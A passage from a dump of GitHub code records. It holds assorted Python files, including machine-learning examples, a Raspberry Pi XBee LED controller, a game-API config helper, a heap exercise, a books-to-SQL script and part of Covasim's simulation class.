read_csv(file_name):\n        matrix = []\n        with open(file_name) as csvfile:\n            readCSV = csv.reader(csvfile, delimiter=',')\n            for row in readCSV:\n                matrix.append(list(map(float, row)))\n        matrix = np.array(matrix)\n        return matrix\n\n    @staticmethod\n    def cal_g(radius, x, v):\n        vector = radius * np.dot(x - v, x - v)\n        return np.exp(-vector)\n\n    @staticmethod\n    def loss_regression(y, y_star):\n        return 0.5 * np.matmul((y_star - y).T, y_star - y)\n\n    @staticmethod\n    def loss_classification(y, y_star):\n        return (np.sum(np.sign(np.abs(np.argmax(y, axis=1) - np.argmax(y_star, axis=1))))) / len(y_star)\n","repo_name":"MhmDSmdi/Neural-Network-using-RBF-kernel","sub_path":"rbf_handler.py","file_name":"rbf_handler.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"488099810","text":"import RPi.GPIO as GPIO\nfrom digi.xbee.devices import XBeeDevice\nfrom digi.xbee.models.status import NetworkDiscoveryStatus\n\n# used serial port on RPi\nPORT = \"/dev/ttyUSB0\" \n\n# baud rate of the devices\nBAUD_RATE = 9600 \n\n# GPIO 18 on RPi\nled = 12 \n\nGPIO.setwarnings(False)\n\n# PAN ID for the coordinator\nREMOTE_ID = \"Coordinator\" \n\n\n# information for the endpoint\nend_device = XBeeDevice(PORT, BAUD_RATE) \n\n\n\n# Function for the user input on the coordinator side of the code: when the user writes 1/0, the LED is turned on/off and data is sent back to the coordinator\ndef data_receive_callback(xbee_message): \n    xbee_network = end_device.get_network()\n    remote_device = xbee_network.discover_device(REMOTE_ID)\n    print(xbee_message.data.decode())\n    if xbee_message.data.decode() == \"1\":\n        print(\"The LED is ON\")\n        GPIO.output(led, GPIO.HIGH)\n        end_device.send_data_async(remote_device, \"Message from Endpoint: You just turned the LED ON\")\n    elif xbee_message.data.decode() == \"0\":\n        GPIO.output(led, GPIO.LOW)\n        end_device.send_data_async(remote_device, \"Message from Endpoint...: You just turned the LED OFF\")\n        print(\"The LED is OFF\")\n    else:\n        print(\"Unrecognized input\")\n\n\n# indicates the setup for the RPi.\ndef setup(): \n    GPIO.setmode(GPIO.BOARD)\n    GPIO.setup(led, GPIO.OUT)\n    GPIO.output(led, GPIO.LOW)\n    \n\n# \"Waiting for data\" message shown while the code is running and waiting for data to be received.\ndef main():\n    \n    try:\n        end_device.open()\n        end_device.add_data_received_callback(data_receive_callback)\n        \n        print(\"Waiting for data...\\n\")\n        input()\n        \n        \n# stop when the needed information is received\n    finally:\n        if end_device is not None and end_device.is_open():\n            end_device.close()\n\ndef destroy():\n    GPIO.output(14, GPIO.LOW)\n    GPIO.cleanup() #CTRL+C\n    exit()\n\nif __name__ == '__main__':\n    setup()\n    try:\n        main()\n    except KeyboardInterrupt:\n        destroy()","repo_name":"aikamadeitah/IT-Technology-Courses","sub_path":"Embedded-Systems/Code/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"43281641918","text":"\"\"\"Code example from: https://www.jianshu.com/p/719fc024c0ec\n\"\"\"\n\nfrom sklearn.datasets import make_classification\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import GradientBoostingClassifier as GBDT\nfrom sklearn.ensemble import ExtraTreesClassifier as ET\nfrom sklearn.ensemble import RandomForestClassifier as RF\nfrom sklearn.ensemble import AdaBoostClassifier as ADA\nfrom 
sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_auc_score\nimport numpy as np\n\n\"\"\"Prepare the data\n\"\"\"\nx,y = make_classification(n_samples=6000)\nX_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.5)\n\n\"\"\"Define the first layer: pick first-layer models that are as expressive as possible, so that the later model can extract enough information\n\"\"\"\nclfs = [ GBDT(n_estimators=100),\n        RF(n_estimators=100),\n        ET(n_estimators=100),\n        ADA(n_estimators=100)\n]\nX_train_stack  = np.zeros((X_train.shape[0], len(clfs)))\nX_test_stack = np.zeros((X_test.shape[0], len(clfs))) \n\n\"\"\"6-fold cross-validation; the first layer's strong models produce out-of-fold predictions that become the feature data fed to the second layer.\n\"\"\"\n### 6-fold stacking\nn_folds = 6\nskf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=1)\nfor i,clf in enumerate(clfs):\n#     print(\"Classifier: {}\".format(clf))\n    X_stack_test_n = np.zeros((X_test.shape[0], n_folds))\n    for j,(train_index,test_index) in enumerate(skf.split(X_train,y_train)):\n        tr_x = X_train[train_index]\n        tr_y = y_train[train_index]\n        clf.fit(tr_x, tr_y)\n        # build the stacking training set\n        X_train_stack [test_index, i] = clf.predict_proba(X_train[test_index])[:,1]\n        X_stack_test_n[:,j] = clf.predict_proba(X_test)[:,1]\n        # build the stacking test set\n    X_test_stack[:,i] = X_stack_test_n.mean(axis=1)\n\n\"\"\"To prevent overfitting, the second layer uses a simple logistic regression model. Print the stacking model's AUC score\n\"\"\"\nclf_second = LogisticRegression(solver=\"lbfgs\")\nclf_second.fit(X_train_stack,y_train)\npred = clf_second.predict_proba(X_test_stack)[:,1]\nscore = roc_auc_score(y_test,pred)#0.9946\nprint(score)\n\n# GBDT classifier\nclf_1 = clfs[0]\nclf_1.fit(X_train,y_train)\npred_1 = clf_1.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test,pred_1)#0.9922\nprint(score)\n\n# Random forest classifier\nclf_2 = clfs[1]\nclf_2.fit(X_train,y_train)\npred_2 = clf_2.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test,pred_2)#0.9944\nprint(score)\n\n# ExtraTrees classifier\nclf_3 = clfs[2]\nclf_3.fit(X_train,y_train)\npred_3 = clf_3.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test,pred_3)#0.9930\nprint(score)\n\n# AdaBoost classifier\nclf_4 = clfs[3]\nclf_4.fit(X_train,y_train)\npred_4 = clf_4.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test,pred_4)#0.9875\nprint(score)","repo_name":"wzzlYwzzl/notebooks","sub_path":"AIStudy/机器学习/集成学习/Stacking/code_example.py","file_name":"code_example.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
{"seq_id":"10263029792","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 27 12:40:00 2020\r\n\r\n@author: POOVAYUVA\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nsalary_train = pd.read_csv(r\"C:\\Users\\POOVAYUVA\\Desktop\\EXCELR ASSIGN\\NAIVE\\SalaryData_Train.csv\")\r\nsalary_test = pd.read_csv(r\"C:\\Users\\POOVAYUVA\\Desktop\\EXCELR ASSIGN\\NAIVE\\SalaryData_Test.csv\")\r\nstring_columns=[\"workclass\",\"education\",\"maritalstatus\",\"occupation\",\"relationship\",\"race\",\"sex\",\"native\"]\r\n\r\nfrom sklearn import preprocessing\r\nnumber = preprocessing.LabelEncoder()\r\nfor i in string_columns:\r\n    salary_train[i] = number.fit_transform(salary_train[i])\r\n    salary_test[i] = number.fit_transform(salary_test[i])\r\n    \r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n\r\ncolnames = salary_train.columns\r\nlen(colnames[0:13])\r\ntrainX = salary_train[colnames[0:13]]\r\ntrainY = salary_train[colnames[13]]\r\ntestX = salary_test[colnames[0:13]]\r\ntestY = salary_test[colnames[13]]\r\n\r\n\r\n# Create SVM classification object \r\n# 'linear', 'poly', 'rbf', 'sigmoid', 
'precomputed'\r\n\r\n# kernel = linear\r\nfrom sklearn.svm import SVC\r\n\r\nhelp(SVC)\r\n\r\nmodel_linear = SVC(kernel = \"linear\")\r\nmodel_linear.fit(trainX,trainY)\r\npred_test_linear = model_linear.predict(testX)\r\n\r\nnp.mean(pred_test_linear==testY) # Accuracy = 85.233\r\n\r\n# Kernel = poly\r\nmodel_poly = SVC(kernel = \"poly\")\r\nmodel_poly.fit(trainX,trainY)\r\npred_test_poly = model_poly.predict(testX)\r\n\r\nnp.mean(pred_test_poly==testY) # Accuracy = 94.499\r\n\r\n# kernel = rbf\r\nmodel_rbf = SVC(kernel = \"rbf\")\r\nmodel_rbf.fit(trainX,trainY)\r\npred_test_rbf = model_rbf.predict(testX)\r\n\r\nnp.mean(pred_test_rbf==testY) # Accuracy = 97.016\r\n\r\n\r\n\r\n","repo_name":"poovanan23/data-science","sub_path":"salary svm.py","file_name":"salary svm.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"4338673227","text":"#SmiteAPIConfig.py\n#Contains all config information for SmiteAPIConfig.ini\n\n#imports\nimport configparser\nimport os\nimport sys\n\n#File path for the config file.\n# determine if application is a script file or frozen exe\nif getattr(sys, 'frozen', False):\n    myDir = os.path.dirname(sys.executable)\nelif __file__:\n    myDir = os.path.dirname(__file__)\nPATH_CONFIG_FILE = os.path.join(myDir, \"config.ini\")\n\nclass Option():\n    def __init__(self, section_name, option_name, value=None):\n        self.section_name = section_name\n        self.option_name = option_name\n        self.value = value\n\nclass Config():\n    path_config_file = PATH_CONFIG_FILE\n\n    # Sections\n    # API SETTINGS\n    SECTION_SMITE_API_SETTINGS = \"API SETTINGS\"\n    SMITE_DEV_ID = \"DEV_ID\"\n    SMITE_AUTH_KEY = \"AUTH_KEY\"\n    PC_URL = \"PC_URL\"\n    XBOX_URL = \"XBOX_URL\"\n    PLAYSTATION_URL = \"PLAYSTATION_URL\"\n\n    # Session. 
Stores current session details so a new one doesn't need to be created every time a request is called\n    SECTION_SESSION = \"SESSION\"\n    OPTION_SESSION_ID = \"SESSION_ID\"\n    OPTION_SESSION_TIMESTAMP = \"SESSION_TIMESTAMP\"\n\n    BLANK_STRING = \" \"\n\n    def __init__(self):\n        # Sets the path of the config file, and the config object from import configparser\n        self.config = configparser.ConfigParser()\n        if (not os.path.exists(self.path_config_file)):\n            print(\"\\nConfig File:\", self.path_config_file, \"does not exist, creating a new one.\")\n            self.create_config_file()\n\n    def create_config_file(self):\n        # self.save_option(self.SECTION_SMITE_API_SETTINGS, self.SMITE_DEV_ID, \"{DEV ID}\")\n        # self.save_option(self.SECTION_SMITE_API_SETTINGS, self.SMITE_AUTH_KEY, \"{AUTH KEY}\")\n        self.save_option(self.SECTION_SMITE_API_SETTINGS, self.PC_URL, \"https://api.smitegame.com/smiteapi.svc\")\n        self.save_option(self.SECTION_SMITE_API_SETTINGS, self.XBOX_URL, \"https://api.xbox.smitegame.com/smiteapi.svc\")\n        self.save_option(self.SECTION_SMITE_API_SETTINGS, self.PLAYSTATION_URL, \"https://api.ps4.smitegame.com/smiteapi.svc\")\n\n        self.save_config_file()\n\n\n    def save_config_file(self):\n        # Whether the function succeeded in writing to the config file or not.\n        result = False\n        try:\n            with open(self.path_config_file, 'w') as config_file:\n                self.config.write(config_file)\n                result = True\n        except Exception as e:\n            print(\"Unable to write to \", self.path_config_file)\n            print(e)\n            result = False\n        return result\n\n    def load_option(self, section_name, option_name):\n        # None values are stored as \" \".\n        value = None\n        self.config.read(self.path_config_file)\n        if (self.config.has_section(section_name)):\n            if (self.config.has_option(section_name, option_name)):\n                value = self.config[section_name][option_name]\n            else:\n                print(\"No option named \\\"\", option_name, \"\\\" inside of section \\\"\", section_name, \"\\\" within \\\"\", self.path_config_file, \"\\\".\"\n                      \"\\n\\tCheck ini file.\", sep=\"\")\n        else:\n            print(\"No section named \\\"\", section_name, \"\\\" within \\\"\", self.path_config_file, \"\\\".\",\n                  \"\\n\\tCheck ini file.\", sep=\"\")\n\n        if value == self.BLANK_STRING:\n            value = None\n        return value\n\n    def save_option(self, section_name, option_name, value):\n        if value is None:\n            value = \" \"\n        else:\n            value = str(value)\n\n        self.config.read(self.path_config_file)\n        if (self.config.has_section(section_name)):\n            self.config[section_name][option_name] = value\n        else:\n            self.config[section_name] = {option_name: value}\n\n        self.save_config_file()\n\n        return value\n\n    def load_smite_api_option(self, option_name):\n        value = None\n        section_name = self.SECTION_SMITE_API_SETTINGS\n        value = self.load_option(section_name, option_name)\n\n        return value\n\n    def save_smite_api_option(self, option_name, value):\n        section_name = self.SECTION_SMITE_API_SETTINGS\n        value = self.save_option(section_name, option_name, value)\n\n        return value\n\n","repo_name":"james1projects/HatmasBot","sub_path":"SmiteAPIConfig.py","file_name":"SmiteAPIConfig.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"28457444658","text":"import heapq\r\n\r\noperations = [\"I 16\", \"I -5643\", \"D -1\", \"D 1\", \"D 1\", \"I 123\", \"D -1\"]\r\ndef solution(operations):\r\n    max_heap, min_heap = [], []\r\n    for query in operations:\r\n        q, n = query.split()\r\n        n = int(n)\r\n        if q == 'I':\r\n            heapq.heappush(max_heap, -n)\r\n            heapq.heappush(min_heap, n)\r\n        elif q == 'D':\r\n            if n == 1:\r\n                if max_heap:\r\n                    x = -heapq.heappop(max_heap)\r\n                    min_heap.remove(x)\r\n            elif n == -1:\r\n                if min_heap:\r\n                    x = -heapq.heappop(min_heap)\r\n                    
max_heap.remove(x)\r\n if max_heap:\r\n mx = -heapq.heappop(max_heap)\r\n else:\r\n mx = 0\r\n if min_heap:\r\n mn = heapq.heappop(min_heap)\r\n else:\r\n mn = 0\r\n return [mx, mn]\r\n\r\nsolution(operations)","repo_name":"park-hg/algorithm-study","sub_path":"dfs,bfs/dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37302525024","text":"\"\"\"Find out Top 5 longest books to read\"\"\"\nimport pandas as pd\nimport sqlalchemy\nimport pymysql\n\nconnection = sqlalchemy.create_engine('mysql+pymysql://root@localhost/my_book')\n\nbooks = pd.read_csv(r\"..\\books.csv\", sep=',', error_bad_lines=False, index_col=0)\n\nprint(books.head())\n\nlongestbooks = books.sort_values('# num_pages', ascending=False)[:5]\nprint(longestbooks)\n\nlongestbooks.to_sql(name='longestbooks',con=connection, if_exists='replace',index=True)\n\nprint(\"Done\")","repo_name":"kartikshende/Books_Analysis_Assigment","sub_path":"AnalysisEachFile/LongestBooks.py","file_name":"LongestBooks.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32829555455","text":"'''\nDefines the Sim class, Covasim's core class.\n'''\n\n#%% Imports\nimport numpy as np\nimport pylab as pl\nimport sciris as sc\nfrom . import version as cvv\nfrom . import utils as cvu\nfrom . import misc as cvm\nfrom . import base as cvb\nfrom . import defaults as cvd\nfrom . import parameters as cvpar\nfrom . import population as cvpop\nfrom . import interventions as cvi\nfrom . import plotting as cvplt\n\n# Specify all externally visible things this file defines\n__all__ = ['Sim']\n\n\nclass Sim(cvb.BaseSim):\n '''\n The Sim class handles the running of the simulation: the number of children,\n number of time points, and the parameters of the simulation.\n\n Args:\n pars (dict): parameters to modify from their default values\n datafile (str): filename of (Excel) data file to load, if any\n datacols (list): list of column names of the data file to load\n label (str): the name of the simulation (useful to distinguish in batch runs)\n simfile (str): the filename for this simulation, if it's saved (default: creation date)\n popfile (str): the filename to load/save the population for this simulation\n load_pop (bool): whether or not to load the population from the named file\n kwargs (dict): passed to make_pars()\n\n **Examples**::\n\n sim = cv.Sim()\n sim = cv.Sim(pop_size=10e3, datafile='my_data.xlsx')\n '''\n\n def __init__(self, pars=None, datafile=None, datacols=None, label=None, simfile=None, popfile=None, load_pop=False, **kwargs):\n # Create the object\n default_pars = cvpar.make_pars(**kwargs) # Start with default pars\n super().__init__(default_pars) # Initialize and set the parameters as attributes\n\n # Set attributes\n self.label = label # The label/name of the simulation\n self.created = None # The datetime the sim was created\n self.simfile = simfile # The filename of the sim\n self.datafile = datafile # The name of the data file\n self.popfile = popfile # The population file\n self.data = None # The actual data\n self.popdict = None # The population dictionary\n self.t = None # The current time in the simulation\n self.people = None # Initialize these here so methods that check their length can see they're empty\n self.results = {} # For storing results\n self.initialized = False # Whether or not initialization is 
complete\n self.results_ready = False # Whether or not results are ready\n\n # Now update everything\n self.set_metadata(simfile, label) # Set the simulation date and filename\n self.load_data(datafile, datacols) # Load the data, if provided\n self.update_pars(pars) # Update the parameters, if provided\n if load_pop:\n self.load_population(popfile) # Load the population, if provided\n\n return\n\n\n def update_pars(self, pars=None, create=False, **kwargs):\n ''' Ensure that metaparameters get used properly before being updated '''\n pars = sc.mergedicts(pars, kwargs)\n if pars:\n if 'pop_type' in pars:\n cvpar.reset_layer_pars(pars)\n if 'prog_by_age' in pars:\n pars['prognoses'] = cvpar.get_prognoses(by_age=pars['prog_by_age']) # Reset prognoses\n super().update_pars(pars=pars, create=create) # Call update_pars() for ParsObj\n return\n\n\n def set_metadata(self, simfile, label):\n ''' Set the metadata for the simulation -- creation time and filename '''\n self.created = sc.now()\n self.version = cvv.__version__\n self.git_info = cvm.git_info()\n if simfile is None:\n datestr = sc.getdate(obj=self.created, dateformat='%Y-%b-%d_%H.%M.%S')\n self.simfile = f'covasim_{datestr}.sim'\n if label is not None:\n self.label = label\n return\n\n\n def load_data(self, datafile=None, datacols=None, **kwargs):\n ''' Load the data to calibrate against, if provided '''\n self.datafile = datafile # Store this\n if datafile is not None: # If a data file is provided, load it\n self.data = cvm.load_data(filename=datafile, columns=datacols, **kwargs)\n\n return\n\n\n def initialize(self, save_pop=False, load_pop=False, popfile=None, **kwargs):\n '''\n Perform all initializations.\n\n Args:\n save_pop (bool): if true, save the population to popfile\n load_pop (bool): if true, load the population from popfile\n popfile (str): filename to load/save the population\n kwargs (dict): passed to init_people\n '''\n self.t = 0 # The current time index\n self.validate_pars() # Ensure parameters have valid values\n self.set_seed() # Reset the random seed\n self.init_results() # Create the results stucture\n self.init_people(save_pop=save_pop, load_pop=load_pop, popfile=popfile, **kwargs) # Create all the people (slow)\n self.init_interventions()\n self.initialized = True\n return\n\n\n def reset_layer_pars(self, force=True):\n '''\n Reset the parameters to match the population.\n\n Args:\n force (bool): reset the pars even if they already exist\n '''\n if self.people is not None:\n layer_keys = self.people.contacts.keys()\n else:\n layer_keys = None\n cvpar.reset_layer_pars(self.pars, layer_keys=layer_keys, force=force)\n return\n\n\n def validate_pars(self):\n ''' Some parameters can take multiple types; this makes them consistent '''\n\n # Handle types\n for key in ['pop_size', 'pop_infected', 'pop_size']:\n try:\n self[key] = int(self[key])\n except Exception as E:\n errormsg = f'Could not convert {key}={self[key]} of {type(self[key])} to integer'\n raise ValueError(errormsg) from E\n\n # Handle start day\n start_day = self['start_day'] # Shorten\n if start_day in [None, 0]: # Use default start day\n start_day = '2020-03-01'\n self['start_day'] = cvm.date(start_day)\n\n # Handle end day and n_days\n end_day = self['end_day']\n n_days = self['n_days']\n if end_day:\n self['end_day'] = cvm.date(end_day)\n n_days = cvm.daydiff(self['start_day'], self['end_day'])\n if n_days <= 0:\n errormsg = f\"Number of days must be >0, but you supplied start={str(self['start_day'])} and end={str(self['end_day'])}, which gives 
n_days={n_days}\"\n raise ValueError(errormsg)\n else:\n self['n_days'] = int(n_days)\n else:\n if n_days:\n self['n_days'] = int(n_days)\n self['end_day'] = self.date(n_days) # Convert from the number of days to the end day\n else:\n errormsg = f'You must supply one of n_days and end_day, not \"{n_days}\" and \"{end_day}\"'\n raise ValueError(errormsg)\n\n # Handle parameters specified by layer\n\n\n # Try to figure out what the layer keys should be\n layer_keys = None # e.g. household, school\n layer_pars = ['beta_layer', 'contacts', 'iso_factor', 'quar_factor']\n if self.people is not None:\n layer_keys = set(self.people.contacts.keys())\n elif isinstance(self['beta_layer'], dict):\n layer_keys = list(self['beta_layer'].keys()) # Get keys from beta_layer since the \"most required\" layer parameter\n else:\n layer_keys = ['a'] # Assume this by default, corresponding to random/no layers\n\n # Convert scalar layer parameters to dictionaries\n for lp in layer_pars:\n val = self[lp]\n if sc.isnumber(val): # It's a scalar instead of a dict, assume it's all contacts\n self[lp] = {k:val for k in layer_keys}\n\n # Handle key mismaches\n for lp in layer_pars:\n lp_keys = set(self.pars[lp].keys())\n if not lp_keys == set(layer_keys):\n errormsg = f'Layer parameters have inconsistent keys:'\n for lp2 in layer_pars: # Fail on first error, but re-loop to list all of them\n errormsg += f'\\n{lp2} = ' + ', '.join(self.pars[lp].keys())\n raise sc.KeyNotFoundError(errormsg)\n\n if self.people is not None:\n pop_keys = set(self.people.contacts.keys())\n if pop_keys != layer_keys:\n errormsg = f'Please update your parameter keys {layer_keys} to match population keys {pop_keys}. You may find sim.reset_layer_pars() helpful.'\n raise sc.KeyNotFoundError(errormsg)\n\n # Handle population data\n popdata_choices = ['random', 'hybrid', 'clustered', 'synthpops']\n choice = self['pop_type']\n if choice not in popdata_choices:\n choicestr = ', '.join(popdata_choices)\n errormsg = f'Population type \"{choice}\" not available; choices are: {choicestr}'\n raise ValueError(errormsg)\n\n # Handle interventions\n self['interventions'] = sc.promotetolist(self['interventions'], keepnone=False)\n for i,interv in enumerate(self['interventions']):\n if isinstance(interv, dict): # It's a dictionary representation of an intervention\n self['interventions'][i] = cvi.InterventionDict(**interv)\n\n return\n\n\n def init_results(self):\n '''\n Create the main results structure.\n We differentiate between flows, stocks, and cumulative results\n The prefix \"new\" is used for flow variables, i.e. counting new events (infections/deaths/recoveries) on each timestep\n The prefix \"n\" is used for stock variables, i.e. counting the total number in any given state (sus/inf/rec/etc) on any particular timestep\n The prefix \"cum\" is used for cumulative variables, i.e. counting the total number that have ever been in a given state at some point in the sim\n Note that, by definition, n_dead is the same as cum_deaths and n_recovered is the same as cum_recoveries, so we only define the cumulative versions\n '''\n\n def init_res(*args, **kwargs):\n ''' Initialize a single result object '''\n output = cvb.Result(*args, **kwargs, npts=self.npts)\n return output\n\n dcols = cvd.get_colors() # Get default colors\n\n # Flows and cumulative flows\n for key,label in cvd.result_flows.items():\n self.results[f'cum_{key}'] = init_res(f'Cumulative {label}', color=dcols[key]) # Cumulative variables -- e.g. 
\"Cumulative infections\"\n\n for key,label in cvd.result_flows.items(): # Repeat to keep all the cumulative keys together\n self.results[f'new_{key}'] = init_res(f'Number of new {label}', color=dcols[key]) # Flow variables -- e.g. \"Number of new infections\"\n\n # Stock variables\n for key,label in cvd.result_stocks.items():\n self.results[f'n_{key}'] = init_res(label, color=dcols[key])\n self.results['n_susceptible'].scale = 'static'\n self.results['bed_capacity'] = init_res('Bed demand relative to capacity', scale=False)\n\n # Other variables\n self.results['r_eff'] = init_res('Effective reproductive number', scale=False)\n self.results['doubling_time'] = init_res('Doubling time', scale=False)\n\n # Populate the rest of the results\n if self['rescale']:\n scale = 1\n else:\n scale = self['pop_scale']\n self.rescale_vec = scale*np.ones(self.npts)\n self.results['t'] = self.tvec\n self.results['date'] = self.datevec\n self.results_ready = False\n\n return\n\n\n def load_population(self, popfile=None, **kwargs):\n '''\n Load the population dictionary from file -- typically done automatically\n as part of sim.initialize(load_pop=True).\n\n Args:\n popfile (str): name of the file to load\n '''\n if popfile is None and self.popfile is not None:\n popfile = self.popfile\n if popfile is not None:\n filepath = sc.makefilepath(filename=popfile, **kwargs)\n self.popdict = sc.loadobj(filepath)\n n_actual = len(self.popdict['uid'])\n n_expected = self['pop_size']\n if n_actual != n_expected:\n errormsg = f'Wrong number of people ({n_expected:n} requested, {n_actual:n} actual) -- please change \"pop_size\" to match or regenerate the file'\n raise ValueError(errormsg)\n if self['verbose']:\n print(f'Loaded population from {filepath}')\n return\n\n\n def init_people(self, save_pop=False, load_pop=False, popfile=None, verbose=None, **kwargs):\n '''\n Create the people.\n\n Args:\n save_pop (bool): if true, save the population to popfile\n load_pop (bool): if true, load the population from popfile\n popfile (str): filename to load/save the population\n verbose (int): detail to prnt\n '''\n\n # Handle inputs\n if verbose is None:\n verbose = self['verbose']\n if verbose:\n print(f'Initializing sim with {self[\"pop_size\"]:0n} people for {self[\"n_days\"]} days')\n if load_pop and self.popdict is None:\n self.load_population(popfile=popfile)\n\n # Actually make the people\n cvpop.make_people(self, save_pop=save_pop, popfile=popfile, verbose=verbose, **kwargs)\n self.people.initialize()\n\n # Create the seed infections\n inds = cvu.choose(self['pop_size'], self['pop_infected'])\n self.people.infect(inds=inds)\n for ind in inds:\n self.people.transtree.linelist[ind] = dict(source=None, target=ind, date=self.t, layer='seed_infection')\n\n return\n\n\n def init_interventions(self):\n ''' Initialize the interventions '''\n # Initialize interventions\n for intervention in self['interventions']:\n if not intervention.initialized:\n intervention.initialize(self)\n return\n\n\n def rescale(self):\n ''' Dynamically rescale the population '''\n if self['rescale']:\n t = self.t\n pop_scale = self['pop_scale']\n current_scale = self.rescale_vec[t]\n if current_scale < pop_scale: # We have room to rescale\n n_not_sus = self.people.count_not('susceptible')\n n_people = len(self.people)\n if n_not_sus / n_people > self['rescale_threshold']: # Check if we've reached point when we want to rescale\n max_ratio = pop_scale/current_scale # We don't want to exceed this\n scaling_ratio = min(self['rescale_factor'], max_ratio)\n 
self.rescale_vec[t:] *= scaling_ratio # Update the rescaling factor from here on\n n = int(n_people*(1.0-1.0/scaling_ratio)) # For example, rescaling by 2 gives n = 0.5*n_people\n new_sus_inds = cvu.choose(max_n=n_people, n=n) # Choose who to make susceptible again\n self.people.make_susceptible(new_sus_inds)\n # print(f\"Rescaled by {scaling_ratio} on {self.datevec[self.t]} because {n_not_sus/n_people}\")#, 2, self['verbose'])\n return\n\n\n def step(self):\n '''\n Step the simulation forward in time\n '''\n\n # Set the time and if we have reached the end of the simulation, then do nothing\n t = self.t\n if t >= self.npts:\n return\n\n # Perform initial operations\n self.rescale() # Check if we need to rescale\n people = self.people # Shorten this for later use\n flows = people.update_states_pre(t=t) # Update the state of everyone and count the flows\n contacts = people.update_contacts() # Compute new contacts\n bed_max = people.count('severe') > self['n_beds'] if self['n_beds'] else False # Check for a bed constraint\n\n # Randomly infect some people (imported infections)\n n_imports = cvu.poisson(self['n_imports']) # Imported cases\n if n_imports>0:\n imporation_inds = cvu.choose(max_n=len(people), n=n_imports)\n flows['new_infections'] += people.infect(inds=imporation_inds, bed_max=bed_max)\n for ind in imporation_inds:\n self.people.transtree.linelist[ind] = dict(source=None, target=ind, date=self.t, layer='importation')\n\n # Apply interventions\n for intervention in self['interventions']:\n intervention.apply(self)\n if self['interv_func'] is not None: # Apply custom intervention function\n self['interv_func'](self)\n\n flows = people.update_states_post(flows) # Check for state changes after interventions\n\n # Compute the probability of transmission\n beta = cvd.default_float(self['beta'])\n asymp_factor = cvd.default_float(self['asymp_factor'])\n frac_time = cvd.default_float(self['viral_dist']['frac_time'])\n load_ratio = cvd.default_float(self['viral_dist']['load_ratio'])\n high_cap = cvd.default_float(self['viral_dist']['high_cap'])\n date_inf = people.date_infectious\n date_rec = people.date_recovered\n date_dead = people.date_dead\n viral_load = cvu.compute_viral_load(t, date_inf, date_rec, date_dead, frac_time, load_ratio, high_cap)\n\n for lkey,layer in contacts.items():\n p1 = layer['p1']\n p2 = layer['p2']\n betas = layer['beta']\n\n # Compute relative transmission and susceptibility\n rel_trans = people.rel_trans\n rel_sus = people.rel_sus\n inf = people.infectious\n sus = people.susceptible\n symp = people.symptomatic\n diag = people.diagnosed\n quar = people.quarantined\n iso_factor = cvd.default_float(self['iso_factor'][lkey])\n quar_factor = cvd.default_float(self['quar_factor'][lkey])\n beta_layer = cvd.default_float(self['beta_layer'][lkey])\n rel_trans, rel_sus = cvu.compute_trans_sus(rel_trans, rel_sus, inf, sus, beta_layer, viral_load, symp, diag, quar, asymp_factor, iso_factor, quar_factor)\n\n # Calculate actual transmission\n for sources,targets in [[p1,p2], [p2,p1]]: # Loop over the contact network from p1->p2 and p2->p1\n target_inds, edge_inds = cvu.compute_infections(beta, sources, targets, betas, rel_trans, rel_sus) # Calculate transmission!\n flows['new_infections'] += people.infect(inds=target_inds, bed_max=bed_max) # Actually infect people\n\n # Store the transmission tree\n for ind in edge_inds:\n source = sources[ind]\n target = targets[ind]\n transdict = dict(source=source, target=target, date=self.t, layer=lkey)\n 
self.people.transtree.linelist[target] = transdict\n self.people.transtree.targets[source].append(transdict)\n\n # Update counts for this time step: stocks\n for key in cvd.result_stocks.keys():\n self.results[f'n_{key}'][t] = people.count(key)\n self.results['bed_capacity'][t] = self.results['n_severe'][t]/self['n_beds'] if self['n_beds'] else 0\n\n # Update counts for this time step: flows\n for key,count in flows.items():\n self.results[key][t] += count\n\n # Tidy up\n self.t += 1\n return\n\n\n def run(self, do_plot=False, until=None, verbose=None, **kwargs):\n '''\n Run the simulation.\n\n Args:\n do_plot (bool): whether to plot\n until (int): day to run until\n verbose (int): level of detail to print\n kwargs (dict): passed to self.plot()\n\n Returns:\n results: the results object (also modifies in-place)\n '''\n\n # Initialize\n T = sc.tic()\n if not self.initialized:\n self.initialize()\n else:\n self.validate_pars() # We always want to validate the parameters before running\n self.init_interventions() # And interventions\n if verbose is None:\n verbose = self['verbose']\n if until:\n until = self.day(until)\n\n # Main simulation loop\n for t in self.tvec:\n\n # Print progress\n if verbose >= 1:\n elapsed = sc.toc(output=True)\n simlabel = f'\"{self.label}\": ' if self.label else ''\n string = f' Running {simlabel}{self.datevec[t]} ({t:2.0f}/{self.pars[\"n_days\"]}) ({elapsed:0.2f} s) '\n if verbose >= 2:\n sc.heading(string)\n elif verbose == 1:\n sc.progressbar(t+1, self.npts, label=string, length=20, newline=True)\n\n # Do the heavy lifting -- actually run the model!\n self.step()\n\n # Check if we were 